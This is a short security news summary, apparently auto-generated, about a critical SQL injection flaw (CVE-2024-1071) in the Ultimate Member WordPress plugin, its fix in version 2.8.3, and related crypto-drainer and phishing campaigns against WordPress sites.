WordPress Plugin Alert – Critical SQLi Vulnerability Threatens 200K+ Websites

WordPress Plugin Alert - Critical SQLi Vulnerability Threatens 200K+ Websites

February 27, 2024 at 01:09AM

A critical security flaw (CVE-2024-1071) has been discovered in the Ultimate Member WordPress plugin, potentially allowing attackers to exploit SQL injection and extract sensitive data from the database. The issue has been addressed in version 2.8.3, following responsible disclosure. Users are strongly advised to update the plugin to mitigate potential threats.

Key Takeaways from the Meeting Notes:

1. A critical security flaw has been disclosed in the WordPress plugin Ultimate Member (CVE-2024-1071) with a high CVSS score of 9.8. The vulnerability allows unauthenticated attackers to conduct SQL injection and extract sensitive data from the database.

2. The issue only affects users who have checked the “Enable custom table for usermeta” option in the plugin settings.

3. A fix for the flaw has been released as version 2.8.3 on February 19, 2024. Users are urged to update the plugin to mitigate potential threats, as an attack attempting to exploit the flaw has already been blocked by Wordfence.

4. Previous exploits in the same plugin (CVE-2023-3460) were actively used by threat actors to create rogue admin users and seize control of vulnerable sites.

5. A new campaign utilizes compromised WordPress sites to inject crypto drainers or redirect users to Web3 phishing sites.

6. A new drainer-as-a-service (DaaS) scheme called CG, backed by a 10,000-member affiliate program, has been discovered, presenting a significant risk to website owners and user assets.

7. Threat actors have been using Telegram bots to facilitate fraudulent operations, including domain cloning and setting wallet addresses for scam funds.

These clear takeaways highlight the urgency for WordPress site owners to update the Ultimate Member plugin and remain vigilant against potential security threats and fraud tactics.

Full Article